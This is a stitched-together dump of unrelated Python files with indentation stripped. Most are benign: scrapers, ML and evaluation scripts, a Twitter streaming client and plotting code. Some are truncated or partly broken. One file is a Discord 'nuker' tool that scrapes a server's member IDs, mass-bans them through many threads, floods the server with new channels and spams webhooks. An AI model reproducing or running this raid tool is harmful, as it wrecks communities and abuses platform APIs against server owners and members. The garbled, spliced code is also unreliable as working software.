description="Run Model Evaluation and Pick the Best Threshold")
parser.add_argument('--datapath', nargs='?', default=os.environ['DATA_PATH'], # noqa
help='input data path')
parser.add_argument('--model', nargs='?', default='model_v30',
help='model version')
    # store_true is used because argparse's type=bool treats any non-empty
    # string (including "False") as True
    parser.add_argument('--pretrained', action='store_true',
                        help='use pre-trained model')
parser.add_argument('--cv', type=int, default=2,
help='n folds for CV')
return parser.parse_args()
if __name__ == '__main__':
# config
RANDOM_STATE = 99
SHUFFLE = True
TEST_SIZE = 0.50
# get args
args = parse_args()
datapath = args.datapath
model = args.model
pretrained = args.pretrained
cv = args.cv
t0 = time.time()
# 1. import module
module = __import__(model)
# 2. load and preprocess data
with timer("Load and Preprocess"):
df_train, _, X_train, _ = load_and_preprocess(datapath, module)
# 3. fit and eval
with timer('Fitting and Validating'):
if cv == 2:
X_t, X_v, y_t, y_v = train_test_split(
X_train, df_train.target,
test_size=TEST_SIZE, random_state=RANDOM_STATE,
shuffle=SHUFFLE, stratify=df_train.target)
best_thres, df_score = fit_and_eval(X_t, y_t, X_v, y_v, module, pretrained) # noqa
filepath = os.path.join(datapath, 'eval_{}.csv'.format(model))
df_score.to_csv(filepath)
print('Save CV score file to {}'.format(filepath))
else:
cv_strat = StratifiedKFold(
n_splits=cv, shuffle=SHUFFLE, random_state=RANDOM_STATE)
avg_thres = 0
score_dfs = []
for idx_train, idx_val in cv_strat.split(X_train, df_train.target):
X_t = X_train[idx_train]
y_t = df_train.target[idx_train]
X_v = X_train[idx_val]
y_v = df_train.target[idx_val]
best_thres, df_score = fit_and_eval(X_t, y_t, X_v, y_v, module)
avg_thres += best_thres
score_dfs.append(df_score)
            best_thres = round(avg_thres / cv, 2)  # average the per-fold thresholds; np.mean of a running scalar sum is just the sum
filepath = os.path.join(datapath, 'trainer_{}.csv'.format(model))
pd.concat(score_dfs, axis=1).to_csv(filepath)
print('Save CV score file to {}'.format(filepath))
print('Entire program is done and it took {:.2f}s'.format(time.time() - t0)) # noqa
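# Hedged invocation sketch (the script file name is an assumption):
#   DATA_PATH=/path/to/data python model_eval.py --model model_v30 --cv 5
#   DATA_PATH=/path/to/data python model_eval.py --model model_v30 --pretrained --cv 2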
|
import requests
import time
from datetime import datetime
import json
import numpy as np
import parser
import sys
import random
from collections import Counter
from bs4 import BeautifulSoup
import urllib.parse
def convert_int(string):
try:
string = int(string)
return string
except:
return string
def get_team(request, link=None):
team = {}
if not link:
team_searched = request
team_searched = urllib.parse.quote(team_searched.encode('utf-8'))
search_link = "http://us.soccerway.com/search/teams/?q={}".format(team_searched)
response = requests.get(search_link)
bs = BeautifulSoup(response.text, 'lxml')
results = bs.find("ul", class_='search-results')
        # Take the first result
try:
link = "http://us.soccerway.com" + results.find_all('a')[0]['href']
print('Please check team link:', link)
team['id_'] = results.find_all('a')[0]["href"].split('/')[4]
team['name'] = results.find_all('a')[0].text
team['country'] = results.find_all('a')[0]["href"].split('/')[2]
except:
print('No team found !')
else:
team['id_'] = link.split('/')[6]
team['name'] = link.split('/')[5]
team['country'] = link.split('/')[4]
return team
def get_games(team, nb_pages=12):
games = []
for page_number in range(nb_pages):
link_base = 'http://us.soccerway.com/a/block_team_matches?block_id=page_team_1_block_team_matches_3&callback_params='
        link_ = urllib.parse.quote('{"page":0,"bookmaker_urls":[],"block_service_id":"team_matches_block_teammatches","team_id":%s,\
"competition_id":0,"filter":"all","new_design":false}' % team['id_']) + '&action=changePage&params=' + urllib.parse.quote('{"page":-%s}' % (page_number))
link = link_base + link_
response = requests.get(link)
test = json.loads(response.text)['commands'][0]['parameters']['content']
bs = BeautifulSoup(test, 'lxml')
for kind in ['even', 'odd']:
for elem in bs.find_all('tr', class_ = kind):
game = {}
game["date"] = elem.find('td', {'class': ["full-date"]}).text
game["competition"] = elem.find('td', {'class': ["competition"]}).text
game["team_a"] = elem.find('td', class_='team-a').text
game["team_b"] = elem.find('td', class_='team-b').text
game['link'] = "http://us.soccerway.com" + elem.find('td', class_='score-time').find('a')['href']
game["score"] = elem.find('td', class_='score-time').text.replace(' ','')
if 'E' in game["score"]:
game["score"] = game['score'].replace('E','')
game['extra_time'] = True
if 'P' in game["score"]:
game["score"] = game['score'].replace('P','')
game['penalties'] = True
if datetime.strptime(game["date"], '%d/%m/%y') < datetime.now():
game = parser.get_score_details(game, team)
time.sleep(random.uniform(0, 0.25))
game.update(parser.get_goals(game['link']))
else:
del game['score']
games.append(game)
games = sorted(games, key=lambda x:datetime.strptime(x['date'], '%d/%m/%y'))
team['games'] = games
return team
def get_squad(team, season_path='./seasons_codes.json'):
with open(season_path, 'r') as f:
seasons = json.load(f)[team["country"]]
    team['squad'] = {}
    team['coach'] = {}  # must exist before the per-season coach assignment below
for k,v in seasons.items():
link_base = 'http://us.soccerway.com/a/block_team_squad?block_id=page_team_1_block_team_squad_3&callback_params='
link_ = urllib.parse.quote('{"team_id":%s}' % team['id_']) + '&action=changeSquadSeason¶ms=' + urllib.parse.quote('{"season_id":%s}' % v)
link = link_base + link_
response = requests.get(link)
test = json.loads(response.text)['commands'][0]['parameters']['content']
bs = BeautifulSoup(test, 'lxml')
players = bs.find('tbody').find_all('tr')
squad = [{
k: convert_int(player.find('td', class_=k).text)
for k in [k for k,v in Counter(np.concatenate([elem.attrs['class'] for elem in player.find_all('td')])).items()
if v < 2 and k not in ['photo', '', 'flag']]
} for player in players]
team['squad'][k] = squad
try:
coach = {'position': 'Coach', 'name':bs.find_all('tbody')[1].text}
team['coach'][k] = coach
except: pass
return team
if __name__ == '__main__':
if len(sys.argv) > 1:
request = ' '.join(sys.argv[1:])
else:
raise ValueError('You must enter a requested team!')
team = get_team(request)
f = input('Satisfied ? (Y/n) ')
count = 0
while f not in ['Y', 'y','yes','']:
if count < 3:
request = input('Enter a new request : ')
link = None
else:
link = input('Paste team link : ')
team = get_team(request, link)
f = input('Satisfied ? (Y/n)')
count += 1
team = get_games(team)
team = get_squad(team)
with open('./teams/%s.json' % team["name"].lower(), 'w') as f:
json.dump(team, f)
|
import platform, os, json, discord
from time import sleep
from random import randint, choice
from threading import Thread
from colored import fg
from discord.ext import commands
from colorama import Fore
from discord.ext.commands import bot
from requests_futures.sessions import FuturesSession
s = Fore.RESET
f = Fore.LIGHTBLACK_EX
m = fg("#19ffc2")
g = fg("#00FF00")
b = fg("#FF0000")
intents = discord.Intents.all()
intents.members = True
with open('config.json') as lol:
config = json.load(lol)
Token = config.get('token')
minwork = config.get('Min-Workers')
maxwork = config.get('Max-Workers')
cname = config.get("channel-names")
reason = config.get('reason')
webname = config.get('webhook-name')
spam = config.get('spam-msg')
session = FuturesSession(max_workers=randint(minwork,maxwork),)
client = commands.Bot(command_prefix="ffff", case_insensitive=False, intents=intents)
client.remove_command("help")
os.system("cls & mode 70,25 & title six nuker")
headers = {"Authorization": f"Bot {Token}"}
def clear():
if platform.system().lower() == "windows":
os.system("cls")
else:
os.system("clear")
@client.event
async def on_ready():
await menu()
async def scrape():
cum = 0
guild = input(f"{s}[{m}STATUS{s}] {m}Serverid{s}:{m} ")
await client.wait_until_ready()
guil = client.get_guild(int(guild))
members = await guil.chunk()
with open('scraped.txt', "w+") as p:
for member in members:
cum += 1
p.write(str(member.id) + "\n")
print(f"{s}[{m}STATUS{s}] [ {m}{cum}{s} ] {m}users scraped in {s}[ {m}{guild} {s}]")
p.close()
sleep(2)
def ban(guild, member):
try:
r = session.put(f"https://canary.discord.com/api/v{randint(7,9)}/guilds/{guild}/bans/{member}", headers=headers, json={"delete_message_days": 7, "reason": choice(reason)}, stream=True).result()
if r.status_code == 429:
print(f"{s}[{m}STATUS{s}] {m}Rate Limited {s}[ {m}{member} {s}] | {m}{r.json['retery_after']}{s}ms")
members = open('scraped.txt').readlines()
ts = []
for _ in range(100, 999):
for member in members:
t = Thread(target=ban, args=(guild, member,))
t.start()
ts.append(t)
for t in ts:
t.join()
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f'{m}Banned{s}: {m}{member}{s}')
except:
pass
def Chook(channel):
try:
json = {'name': choice(webname)}
r = session.post(f"https://canary.discord.com/api/v{randint(7,9)}/channels/{channel}/webhooks", headers=headers, json=json)
wid = r.json()['id']
wtoken = r.json('token')
return f"https://canary.discord.com/api/webhooks/{wid}/{wtoken}"
except:
pass
def Shook(hook):
try:
for _ in range(9999999):
payload = {'username': choice(webname), 'content': f"@everyone test"}
session.post(hook, json=payload)
except:
pass
def Cchannel(guild):
try:
json = {'name': choice(cname), 'type': 0}
r = session.post(f'https://discord.com/api/v{randint(6,8)}/guilds/{guild}/channels', headers=headers, json=json).result()
if r.status_code == 429:
ts = []
for i in range(100, 999):
t = Thread(target=Cchannel, args=(guild, ))
t.start()
ts.append(t)
for t in ts:
t.join()
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"{s}[{m}STATUS{s}] {m}created channel {s}| {m}{json['id']}{s}")
#not going to work because it isn't done
#try:
# hook = pix.Chook(r.json['id'])
# ts = []
# for i in range(100, 999):
# t = Thread(target=Shook, args=(hook, ))
# t.start()
# ts.append(t)
# for t in ts:
# t.join()
#except:
# pass
except:
pass
def ui():
print(f'''
{s}┌─┐ ┬ ─┐ ┬
{f}└─┐ │ ┌┴┬┘
{m}└─┘ ┴ ┴ └─
{s}[{m}1{s}] {m}Mass Banner {s}| [{m}2{s}] {m}Webhook Spammer{s}
{s}[{m}3{s}] {m}Scraper {s}| [{m}4{s}] {m}Empty{s}
''')
def ui2():
print(f'''
{s}┌─┐ ┬ ─┐ ┬
{f}└─┐ │ ┌┴┬┘
{m}└─┘ ┴ ┴ └─
{s}[ {m}! {s}] {m}Incorrect Token{s}
''')
async def menu():
ui()
while True:
cmd = input(f"{s}[{m}STATUS{s}] {m}Choice{s}:{m} ")
if cmd == "1":
guild = input(f"{s}[{m}STATUS{s}] {m}Serverid{s}:{m} ")
members = open('scraped.txt').readlines()
print(f"{s}[{m}STATUS{s}] [ {m}{len(members)}{s} ] {m}users ready to ban for {s}[ {m}{guild} {s}]")
sleep(3)
clear()
ui()
ts = []
for _ in range(100, 999):
for member in members:
t = Thread(target=ban, args=(guild, member,))
t.start()
ts.append(t)
for t in ts:
t.join()
elif cmd == "2":
guild = input(f"{s}[{m}STATUS{s}] {m}Serverid{s}:{m} ")
clear()
ui()
ts = []
for i in range(100, 999):
t = Thread(target=Cchannel, args=(guild, ))
t.start()
ts.append(t)
for t in ts:
t.join()
elif cmd == "3":
await scrape()
def login():
try:
client.run(Token)
except:
ui2()
sleep(5)
if __name__ == "__main__":
login()
|
#!/usr/bin/env python
# coding: utf8
"""Download metadata from the DBLP archive.
Usage
-----
```
$ python scripts/parse_dblp.py submissions.csv proceedings.json
```
"""
import argparse
import logging
import json
import os
import pandas as pd
import sys
import time
import tqdm
import zen.models
def parse_one(rec):
    # Placeholder: per-record parsing is not implemented yet.
    pass
def parse_csv(fname, encoding='utf-16'):
df = pd.read_csv(fname, encoding=encoding, index_col=0)
return df.apply(parse_one, axis=1)
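# `main` is called in the __main__ block below but was missing from this
# script. The following is a hedged, minimal sketch of the intended flow
# (parse the CSV, dump the records as JSON); everything in the body is an
# assumption, not the original implementation. num_cpus, verbose, resume and
# delay are accepted only to match the call site.
def main(csv_file, output_file, num_cpus, verbose, resume, delay):
    records = parse_csv(csv_file)
    with open(output_file, 'w') as fp:
        json.dump(list(records), fp)
    return True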
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=__doc__)
# Inputs
parser.add_argument("csv_file",
metavar="csv_file", type=str,
help="Path to a CSV file of submissions.")
parser.add_argument("output_file",
metavar="output_file", type=str,
help="Path to write the output metadata as JSON.")
parser.add_argument("--num_cpus",
metavar="num_cpus", type=int, default=-2,
help="Number of CPUs to use in parallel.")
parser.add_argument("--verbose",
metavar="verbose", type=int, default=0,
help="Verbosity level for joblib.")
parser.add_argument("--resume",
action='store_true',
help="If given, will resume")
parser.add_argument("--delay",
type=float, default=0.5,
help="Delay time in seconds between XML requests.")
args = parser.parse_args()
    success = main(args.csv_file, args.output_file, args.num_cpus,
                   args.verbose, args.resume, args.delay)
logging.info("Complete scrape: success={}".format(success))
sys.exit(0 if success else 1)
|
#date and time
import datetime
current_date=datetime.date.today()
print(current_date)
print(current_date.month)
print(current_date.year)
print("Current date is: "+str(current_date.day))
|
import numpy as np
# # Problem domain definition
# # *******************************************************
# state = [0, 1, 2, 3, 4]
# action = [0, 1, 2], representing moving left, staying, moving right respectively
# Transition probability
T = np.array([
    [[1/2, 1/2, 0, 0, 0], [1/2, 1/2, 0, 0, 0], [2/3, 1/3, 0, 0, 0]],
    [[1/3, 2/3, 0, 0, 0], [1/4, 1/2, 1/4, 0, 0], [0, 2/3, 1/3, 0, 0]],
    [[0, 1/3, 2/3, 0, 0], [0, 1/4, 1/2, 1/4, 0], [0, 0, 2/3, 1/3, 0]],
    [[0, 0, 1/3, 2/3, 0], [0, 0, 1/4, 1/2, 1/4], [0, 0, 0, 2/3, 1/3]],
    [[0, 0, 0, 1/3, 2/3], [0, 0, 0, 1/2, 1/2], [0, 0, 0, 1/2, 1/2]],
])  # T[s][a][t] = P(next state t | state s, action a)
# Number of actions/transitions
num_state = 5
num_action = 3
# Discount factor
r = 1/2
# Reward
R = np.zeros(5)
R[4] = 1
# # *******************************************************
# Initialization
V = np.zeros(5)
num_iter = 100
# Run the V-Q iterations
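# Each sweep below applies the Bellman optimality backup
#   Q(s, a) = sum_t T[s][a][t] * (R[s] + r * V(t)),   V(s) = max_a Q(s, a)
# which converges to the optimal value function as the iterations proceed.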
for i in range(num_iter):
Q = [[sum([T[s][a][t] * (R[s] + r * V[t]) for t in range(num_state)]) for a in range(num_action)] for s in range(num_state)]
V = np.max(Q, axis=1)
print(V) |
"""Disaster Tweet Classification, Helpers
This module provides helper functions, to be used for the naive Bayes algorithm of main.py. The
purposes of the helper functions relate to reading files, checking render, dividing original
training set into two sets, and tokenizing and normalizing the text data.
They are not meant for standalone purposes.
Copyright (c) 2021 Akshat Naik.
Licensed under the MIT License. See LICENSE in the project root for license information.
"""
import csv, re, random
from pprint import pprint as pp
from typing import Iterable
def get_dataset(filename: str) -> list[list[str]]:
"""Returns the dataset of the filename, rendered using csv, where filename takes four possible
parameters: 'train', 'new_train', 'dev' or 'test'
"""
if filename in ('train', 'test'):
filename = f'nlp-getting-started/{filename}.csv'
elif filename in ('new_train', 'dev'):
filename = f'data/{filename}.csv'
else:
raise ValueError('Incorrect value passed to filename parameter.')
with open(filename, 'r', encoding='utf-8', newline='') as csvfile:
tweetsreader = csv.reader(csvfile)
next(tweetsreader)
return list(tweetsreader)
def check_render(dataset: list[list[str]], is_test: bool) -> bool:
"""Returns whether the dataset has been rendered correctly by the csv module."""
for line in dataset:
if not is_test: # if it is a training dataset, then target is also there
id, keyword, location, text, target = line
else:
id, keyword, location, text = line
        if re.fullmatch('[0-9]+', id) is None or text == '':
print(line)
return False
elif not is_test and target not in ('0', '1'):
print(line)
return False
return True
def divide_train_set() -> None:
"""Divides the original training set into a new training set and a development set."""
random.seed(1926) # for reproducibility
# divides the original set into a new training set and a development set
original_train_set = get_dataset('train')
n_dev_set = len(original_train_set) // 10
dev_set = random.sample(original_train_set, k=n_dev_set)
new_train_set = []
for line in original_train_set:
if line not in dev_set:
new_train_set.append(line)
# writes the new sets to their respective new files
with open('data/new_train.csv', 'w', encoding='utf-8', newline='') as csvfile:
new_train_writer = csv.writer(csvfile)
new_train_writer.writerow(['id', 'keyword', 'location', 'text', 'target'])
new_train_writer.writerows(new_train_set)
with open('data/dev.csv', 'w', encoding='utf-8', newline='') as csvfile:
dev_writer = csv.writer(csvfile)
dev_writer.writerow(['id', 'keyword', 'location', 'text', 'target'])
dev_writer.writerows(dev_set)
def process_tweets(text: str) -> list[str]:
"""Returns a list of tokens from the text of the tweet after normalizing and tokenizing the
text of the tweet.
"""
text = text.lower()
# Remove urls
text = re.sub(r'http\S+|www\S+', '', text)
# Remove user @ references and # from tweet
text = re.sub(r'\@\w+|\#', '', text)
# Remove punctuations that occur either start of the string or end-of-word
# and "words" that contain only numbers and punctuations (like dates or time),
# and condense all whitespaces to one whitespace
text = re.sub(r'^[^A-Za-z]+|\b[^A-Za-z]+', '', text)
# Tokenize by splitting by whitespaces
list_of_words = text.split()
return list_of_words
def get_vocab(dataset: list[list[str]]) -> set[str]:
"""Returns a set of words that are found in the text field of the dataset."""
vocab = set()
for line in dataset:
text = line[3]
words = process_tweets(text)
vocab.update(words)
return vocab
def divide_dataset_targets(dataset: list[list[str]]) -> tuple[list[list[str]], list[list[str]]]:
"""Return two datasets, one with only 0 as the target and one with only 1 as the target in the
text field of the dataset.
"""
data_0 = []
data_1 = []
for line in dataset:
if line[-1] == '0':
data_0.append(line)
elif line[-1] == '1':
data_1.append(line)
else:
raise ValueError('The value of the target is neither 0 nor 1')
return data_0, data_1
if __name__ == "__main__":
train = get_dataset('train')
test = get_dataset('test')
# divide_train_set()
new_train = get_dataset('new_train')
dev = get_dataset('dev')
assert len(new_train) + len(dev) == len(train)
for i in (train, new_train, dev):
print(check_render(i, False))
print(check_render(test, True))
|
try:
import urllib.request as urllib_request
import urllib.error as urllib_error
import io
except ImportError:
import urllib2 as urllib_request
import urllib2 as urllib_error
import json
from ssl import SSLError
import socket
import sys, select, time
from .api import TwitterCall, wrap_response, TwitterHTTPError
def recv_chunk(sock): # -> bytearray:
buf = sock.recv(8) # Scan for an up to 16MiB chunk size (0xffffff).
crlf = buf.find(b'\r\n') # Find the HTTP chunk size.
if crlf > 0: # If there is a length, then process it
remaining = int(buf[:crlf], 16) # Decode the chunk size.
start = crlf + 2 # Add in the length of the header's CRLF pair.
end = len(buf) - start
chunk = bytearray(remaining)
if remaining <= 2: # E.g. an HTTP chunk with just a keep-alive delimiter or end of stream (0).
chunk[:remaining] = buf[start:start + remaining]
# There are several edge cases (remaining == [3-6]) as the chunk size exceeds the length
# of the initial read of 8 bytes. With Twitter, these do not, in practice, occur. The
# shortest JSON message starts with '{"limit":{'. Hence, it exceeds in size the edge cases
# and eliminates the need to address them.
else: # There is more to read in the chunk.
chunk[:end] = buf[start:]
chunk[end:] = sock.recv(remaining - end)
sock.recv(2) # Read the trailing CRLF pair. Throw it away.
return chunk
return bytearray()
## recv_chunk()
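# Wire-format illustration (hedged): an HTTP chunk arrives as
#   b'1f\r\n' + <0x1f bytes of JSON payload> + b'\r\n'
# recv_chunk() decodes the hex length, reads the payload, and discards the
# trailing CRLF pair.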
class TwitterJSONIter(object):
def __init__(self, handle, uri, arg_data, block=True, timeout=None):
self.handle = handle
self.uri = uri
self.arg_data = arg_data
self.block = block
self.timeout = timeout
def __iter__(self):
sock = self.handle.fp.raw._sock if sys.version_info >= (3, 0) else self.handle.fp._sock.fp._sock
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
sock.setblocking(self.block and not self.timeout)
buf = ''
json_decoder = json.JSONDecoder()
timer = time.time()
while True:
try:
buf = buf.lstrip()
res, ptr = json_decoder.raw_decode(buf)
buf = buf[ptr:]
yield wrap_response(res, self.handle.headers)
timer = time.time()
continue
except ValueError as e:
if self.block: pass
else: yield None
try:
buf = buf.lstrip() # Remove any keep-alive delimiters to detect hangups.
if self.timeout:
ready_to_read = select.select([sock], [], [], self.timeout)
if ready_to_read[0]:
buf += recv_chunk(sock).decode('utf-8') # This is a non-blocking read.
if time.time() - timer > self.timeout:
yield {'timeout': True}
else: yield {'timeout': True}
else:
buf += recv_chunk(sock).decode('utf-8')
if not buf and self.block:
yield {'hangup': True}
break
except SSLError as e:
# Error from a non-blocking read of an empty buffer.
if (not self.block or self.timeout) and (e.errno == 2): pass
else: raise
def handle_stream_response(req, uri, arg_data, block, timeout=None):
try:
handle = urllib_request.urlopen(req,)
except urllib_error.HTTPError as e:
raise TwitterHTTPError(e, uri, 'json', arg_data)
return iter(TwitterJSONIter(handle, uri, arg_data, block, timeout=timeout))
class TwitterStreamCallWithTimeout(TwitterCall):
def _handle_response(self, req, uri, arg_data, _timeout=None):
return handle_stream_response(req, uri, arg_data, block=True, timeout=self.timeout)
class TwitterStreamCall(TwitterCall):
def _handle_response(self, req, uri, arg_data, _timeout=None):
return handle_stream_response(req, uri, arg_data, block=True)
class TwitterStreamCallNonBlocking(TwitterCall):
def _handle_response(self, req, uri, arg_data, _timeout=None):
return handle_stream_response(req, uri, arg_data, block=False)
class TwitterStream(TwitterStreamCall):
"""
The TwitterStream object is an interface to the Twitter Stream API
(stream.twitter.com). This can be used pretty much the same as the
Twitter class except the result of calling a method will be an
iterator that yields objects decoded from the stream. For
example::
twitter_stream = TwitterStream(auth=OAuth(...))
iterator = twitter_stream.statuses.sample()
for tweet in iterator:
...do something with this tweet...
The iterator will yield tweets forever and ever (until the stream
breaks at which point it raises a TwitterHTTPError.)
The `block` parameter controls if the stream is blocking. Default
is blocking (True). When set to False, the iterator will
occasionally yield None when there is no available message.
"""
def __init__(
self, domain="stream.twitter.com", secure=True, auth=None,
api_version='1.1', block=True, timeout=None):
uriparts = ()
uriparts += (str(api_version),)
if block:
if timeout:
call_cls = TwitterStreamCallWithTimeout
else:
call_cls = TwitterStreamCall
else:
call_cls = TwitterStreamCallNonBlocking
TwitterStreamCall.__init__(
self, auth=auth, format="json", domain=domain,
callable_cls=call_cls,
secure=secure, uriparts=uriparts, timeout=timeout, gzip=False)
|
import math
def math_pow_test(x, y):
return math.pow(x, y)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import warnings
warnings.filterwarnings('ignore')
__tool_name__='STREAM'
print('''
_____ _______ _____ ______ __ __
/ ____|__ __| __ \| ____| /\ | \/ |
| (___ | | | |__) | |__ / \ | \ / |
\___ \ | | | _ /| __| / /\ \ | |\/| |
____) | | | | | \ \| |____ / ____ \| | | |
|_____/ |_| |_| \_\______/_/ \_\_| |_|
FeatureSelection...
''',flush=True)
import stream as st
import argparse
import multiprocessing
import os
from slugify import slugify
import networkx as nx
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib as mpl
import sys
mpl.use('Agg')
mpl.rc('pdf', fonttype=42)
os.environ['KMP_DUPLICATE_LIB_OK']='True'
print('- STREAM Single-cell Trajectory Reconstruction And Mapping -',flush=True)
print('Version %s\n' % st.__version__,flush=True)
print('sys.argv is', sys.argv)
def main():
sns.set_style('white')
sns.set_context('poster')
parser = argparse.ArgumentParser(description='%s Parameters' % __tool_name__ ,formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-m", "--data-file", dest="input_filename",default = None, help="input file name, pkl format from Stream preprocessing module", metavar="FILE")
parser.add_argument("--flag_useprecomputed",dest="flag_useprecomputed", action="store_true", help="use precomputed features for PCA")
parser.add_argument("--flag_firstpc",dest="flag_firstpc", action="store_true", help="Use the first principal component")
parser.add_argument("--flag_pca",dest="flag_pca", action="store_true", help="perform PCA")
parser.add_argument("--flag_variable",dest="flag_variable", action="store_true", help="find variable genes")
parser.add_argument("-of","--of",dest="output_filename_prefix", default="StreamiFSOutput", help="output file name prefix")
parser.add_argument("-lf","--loess_fraction",dest="loess_fraction", type=float, default=None, help="loess fraction")
parser.add_argument("-per",dest="percentile", type = int, default=None, help="percent of variable genes to find")
parser.add_argument("-n_g",dest="num_genes", type=int, default=None, help="num genes")
parser.add_argument("-n_j",dest="num_jobs", type=int, default=None, help="num jobs")
parser.add_argument("-feat",dest="feature", default=None, help="feature")
parser.add_argument("-n_pc",dest="num_principal_components", type=int, default=None, help="num principal components")
parser.add_argument("-max_pc",dest="max_principal_components", type=int, default=None, help="max principal components")
parser.add_argument("-fig_width",dest="fig_width", type=int, default=8, help="")
parser.add_argument("-fig_height",dest="fig_height", type=int, default=8, help="")
parser.add_argument("--flag",dest="flag", action="store_true", help="debugging flag")
args = parser.parse_args()
print('Starting feature selection procedure...')
print(args)
workdir = "./"
adata = st.read(file_name=args.input_filename, file_format='pkl', experiment='rna-seq', workdir=workdir)
print('Input: '+ str(adata.obs.shape[0]) + ' cells, ' + str(adata.var.shape[0]) + ' genes')
#print('N_genes is ' + str(args.num_genes))
if (args.flag_variable):
st.select_variable_genes(adata,loess_frac=args.loess_fraction,percentile=args.percentile,n_genes=args.num_genes,n_jobs=args.num_jobs, save_fig=True, fig_name=(args.output_filename_prefix + '_variable_genes.png'), fig_size=(args.fig_width,args.fig_height ), fig_path="./")
if (args.flag_pca):
st.select_top_principal_components(adata, feature=args.feature,n_pc=args.num_principal_components,max_pc=args.max_principal_components,first_pc=args.flag_firstpc,use_precomputed=args.flag_useprecomputed, save_fig=True, fig_name=(args.output_filename_prefix + '_pca.png'), fig_size=(args.fig_width,args.fig_height ), fig_path='./')
st.write(adata,file_name=(args.output_filename_prefix + '_stream_result.pkl'),file_path='./',file_format='pkl')
print('Output: '+ str(adata.obs.shape[0]) + ' cells, ' + str(adata.var.shape[0]) + ' genes')
print('Finished computation.')
if __name__ == "__main__":
main()
|
from datetime import datetime
from getCryptocurrencyRate import CryptoCurrencyRate
product = "BTC_JPY"
# ["BTC_JPY", "XRP_JPY", "ETH_JPY", "XTZ_JPY", "XLM_JPY", "XEM_JPY", "BAT_JPY", "ETC_JPY", "LTC_JPY", "BCH_JPY", "MONA_JPY", "LSK_JPY"]
scale = "hour"
# ["hour","day","week","month","year"]
res = CryptoCurrencyRate(product, scale).get()
print("\n***情報***")
print("リクエストステータス " + str(res.status))
print("現在 " + res.price_info_list[-1].price_str + "JPY")
print("推移 " + res.change_str + "%")
print("\n***一覧***")
for price_info in res.price_info_list:
print(datetime.fromtimestamp(price_info.timestamp))
print(price_info.price_str + "JPY")
|
"""
An example script showing inference on the newly collected images in U3DPW.
"""
import sys
sys.path.append("../")
import libs.model.model as libm
from libs.dataset.h36m.data_utils import unNormalizeData
import torch
import numpy as np
import imageio
import matplotlib.pyplot as plt
import time
num_joints = 16
gt_3d = False
pose_connection = [[0,1], [1,2], [2,3], [0,4], [4,5], [5,6], [0,7], [7,8],
[8,9], [9,10], [8,11], [11,12], [12,13], [8, 14], [14, 15], [15,16]]
# 16 out of 17 key-points are used as inputs in this example model
re_order_indices= [0, 1, 2, 3, 4, 5, 6, 7, 8, 10, 11, 12, 13, 14, 15, 16]
# paths
data_dic_path = './example_annot.npy'
model_path = './example_model.th'
stats = np.load('./stats.npy', allow_pickle=True).item()
dim_used_2d = stats['dim_use_2d']
mean_2d = stats['mean_2d']
std_2d = stats['std_2d']
# load the checkpoint and statistics
ckpt = torch.load(model_path)
data_dic = np.load(data_dic_path, allow_pickle=True).item()
# initialize the model
cascade = libm.get_cascade()
input_size = 32
output_size = 48
for stage_id in range(2):
# initialize a single deep learner
stage_model = libm.get_model(stage_id + 1,
refine_3d=False,
norm_twoD=False,
num_blocks=2,
input_size=input_size,
output_size=output_size,
linear_size=1024,
dropout=0.5,
leaky=False)
cascade.append(stage_model)
cascade.load_state_dict(ckpt)
cascade.eval()
# process and show total_to_show examples
count = 0
total_to_show = 10
def draw_skeleton(ax, skeleton, gt, add_index=True):
# draw the 2-d skeleton
for i in range(len(skeleton)):
if gt:
ax.plot(skeleton[i,0], skeleton[i,1], 'o', color='b')
else:
ax.plot(skeleton[i,0], skeleton[i,1], 'o', color='r')
for segment_idx in range(len(pose_connection)):
point1_idx = pose_connection[segment_idx][0]
point2_idx = pose_connection[segment_idx][1]
point1 = skeleton[point1_idx]
point2 = skeleton[point2_idx]
color = 'k' if gt else 'r'
plt.plot([int(point1[0]),int(point2[0])],
[int(point1[1]),int(point2[1])],
c=color,
linewidth=2)
if add_index:
for (idx, re_order_idx) in enumerate(re_order_indices):
plt.text(skeleton[re_order_idx][0],
skeleton[re_order_idx][1],
str(idx+1),
color='b'
)
return
def normalize(skeleton, re_order=None):
norm_skel = skeleton.copy()
if re_order is not None:
norm_skel = norm_skel[re_order].reshape(32)
norm_skel = norm_skel.reshape(16, 2)
mean_x = np.mean(norm_skel[:,0])
std_x = np.std(norm_skel[:,0])
mean_y = np.mean(norm_skel[:,1])
std_y = np.std(norm_skel[:,1])
denominator = (0.5*(std_x + std_y))
norm_skel[:,0] = (norm_skel[:,0] - mean_x)/denominator
norm_skel[:,1] = (norm_skel[:,1] - mean_y)/denominator
norm_skel = norm_skel.reshape(32)
return norm_skel
def get_pred(cascade, data):
"""
Get prediction from a cascaded model
"""
# forward pass to get prediction for the first stage
num_stages = len(cascade)
# for legacy code that does not have the num_blocks attribute
for i in range(len(cascade)):
cascade[i].num_blocks = len(cascade[i].res_blocks)
prediction = cascade[0](data)
# prediction for later stages
for stage_idx in range(1, num_stages):
prediction += cascade[stage_idx](data)
return prediction
def show3Dpose(channels,
ax,
lcolor="#3498db",
rcolor="#e74c3c",
add_labels=True,
gt=False,
pred=False
):
vals = np.reshape( channels, (32, -1) )
I = np.array([1,2,3,1,7,8,1, 13,14,15,14,18,19,14,26,27])-1 # start points
J = np.array([2,3,4,7,8,9,13,14,15,16,18,19,20,26,27,28])-1 # end points
LR = np.array([1,1,1,0,0,0,0, 0, 0, 0, 0, 0, 0, 1, 1, 1], dtype=bool)
# Make connection matrix
for i in np.arange( len(I) ):
x, y, z = [np.array( [vals[I[i], j], vals[J[i], j]] ) for j in range(3)]
if gt or pred:
color = 'k' if gt else 'r'
ax.plot(x,y, z, lw=2, c=color)
else:
ax.plot(x,y, z, lw=2, c=lcolor if LR[i] else rcolor)
RADIUS = 750 # space around the subject
xroot, yroot, zroot = vals[0,0], vals[0,1], vals[0,2]
ax.set_xlim3d([-RADIUS+xroot, RADIUS+xroot])
ax.set_zlim3d([-RADIUS+zroot, RADIUS+zroot])
ax.set_ylim3d([-RADIUS+yroot, RADIUS+yroot])
if add_labels:
ax.set_xlabel("x")
ax.set_ylabel("z")
ax.set_zlabel("y")
ax.set_aspect('auto')
